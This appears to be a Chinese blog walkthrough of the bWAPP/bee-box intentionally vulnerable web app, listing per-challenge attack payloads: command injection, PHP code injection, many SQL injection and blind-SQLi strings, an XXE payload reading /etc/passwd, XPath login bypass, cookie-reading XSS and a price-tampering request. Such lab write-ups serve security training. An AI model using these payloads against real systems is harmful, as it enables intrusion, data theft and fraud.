标签:bwapp
下载&安装
bwapp可以单独下载,然后部署到apache+php+mysql的环境,也可以下载他的虚拟机版本bee-box,但是有好多漏洞是bee-box里边有,但单独安装bwapp没有的,比如破壳漏洞,心脏滴血漏洞等。我这里主要用bee-box进行介绍。
下载地址
【传送门】
开始搞事情
【Low】
<a href="http://www.baidu.com">OnClick</a>
【medium】
%3ca href=http://www.baidu.com%3eClick%3c/a%3e
【Low】
<a href="http://www.baidu.com">OnClick</a>
【medium】
%3ca href=http://www.baidu.com%3eClick%3c/a%3e
0x02 iFrame Injection
?ParamUrl=http://www.baidu.com
0x03 OS Command Injection
Exploit(Low)
www.nsa.gov;id
Exploit(medium)
www.nsa.gov|id
0x04 PHP Code Injection
?message=phpinfo()
0x05 SQL Injection (GET/Search)
Exploit(Low)
-1 %‘+union+select+1,2,3,4,version(),6,7 --+
0x06 SQL Injection (GET/Select)
Exploit(Low)
?movie=-1 union select 1,2,3,4,version(),6,7
0x07 SQL Injection (POST/Search)
title=Iron+Man%‘UNION SELECT 1,2,3,4,version(),6,7 #
0x08 SQL Injection (POST/Select)
movie=-1 UNION SELECT 1,2,3,4,version(),6,7
0x09 SQL Injection (AJAX/JSON/jQuery)
http://192.168.0.32/bWAPP/sqli_10-2.php?title=I%%27+UNION+SELECT+1,2,3,4,version(),6,7+--+
0x10 SQL Injection (CAPTCHA)
?title=Iron+Man%‘ UNION SELECT 1,2,3,4,version(),6,7 --+
0x11 SQL Injection (Login Form/Hero)
superhero‘ or 1=1#
0x12 SQL Injection (Login Form/User)
login=‘ and 0 UNION SELECT 1,2,‘356a192b7913b04c54574d18c28d46e6395428ab‘,4,5,6,7,8,9# &password=1 &form=submit
0x13 SQL Injection - Stored (Blog)
‘,(select version()))#
0x14 SQL Injection - Stored (User-Agent)
User-AgentL: 123‘,(select version()))#
0x15 SQL Injection - Stored (XML)
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE copyright [<!ENTITY test SYSTEM "file:///etc//passwd">]> <rest> <login>&test;</login> <secret>login</secret> </rest>
0x16 SQL Injection - Blind - Boolean-Based
?title=Iron Man ‘ and (substr((select version()),1,1)=5) --+
0x17 SQL Injection - Blind - Time-Based
?title=Iron Man‘ and (if((substr((select version()),1,1)=5),sleep(5),null)) --+
0x18 SQL Injection - Blind (WS/SOAP)
?title=Iron Man ‘ and (substr((select version()),1,1)=5) --+
0x19 XML/XPath Injection (Login Form)
http://192.168.0.32/bWAPP/xmli_1.php ?login=‘ or ‘1‘=‘1 &password=‘ or ‘1‘=‘1 &form=submit
0x20 Broken Auth. - CAPTCHA Bypassing
0x21 Broken Auth. - Forgotten Function
0x22 Broken Auth. - Insecure Login Forms
0x23 Broken Auth. - Password Attacks
0x24 Broken Auth. - Weak Passwords
0x25 Session Mgmt. - Administrative Portals
0x26 XSS - Reflected (GET)
<script>alert(document.cookie)</script>
0x27 XSS - Reflected (POST)
<script>alert(document.cookie)</script>
0x28 XSS - Reflected (JSON)
<img src=1 onerror=alert(1) />
0x29 XSS - Reflected (AJAX/JSON)
<img src=1 onerror=alert(1) />
0x30 XSS - Reflected (Back Button)
Referer: ‘" onmousemove="alert(1)" 修改请求包referer字段
0x31 XSS - Reflected (Custom Header)
bWAPP: <script>alert(1)</script> 增加请求包字段
0x32 XSS - Reflected (Eval)
?date=alert(document.cookie)
0x33 XSS - Reflected (HREF)
><script>alert(1)</script>
0x34 XSS - Reflected (Login Form)
login=‘ or 1=1 &password=<script>alert(1)</script> &form=submit
0x35 XSS - Reflected (PHP_SELF)
<script>alert(document.cookie)</script>
0x36 XSS - Reflected (Referer)
<script>alert(document.cookie)</script>
0x37 XSS - Reflected (User-Agent)
<script>alert(document.cookie)</script>
0x38 XSS - Stored (Blog)
<script>alert(document.cookie)</script>
0x39 XSS - Stored (User-Agent)
User-Agent: <script>alert(document.cookie)</script>
0x40 Insecure DOR (Order Tickets)
(Low) ticket_quantity=15&ticket_price=0&action=order 修改 数据包 ticket_price 的值
(medium) ticket_quantity=15&ticket_price=0&action=order 在 请求包中增加ticket_price 参数 并赋值。
本文出自 “启思·朝圣者” 博客,请务必保留此出处http://dearch.blog.51cto.com/10423918/1950456
标签:bwapp
原文地址:http://dearch.blog.51cto.com/10423918/1950456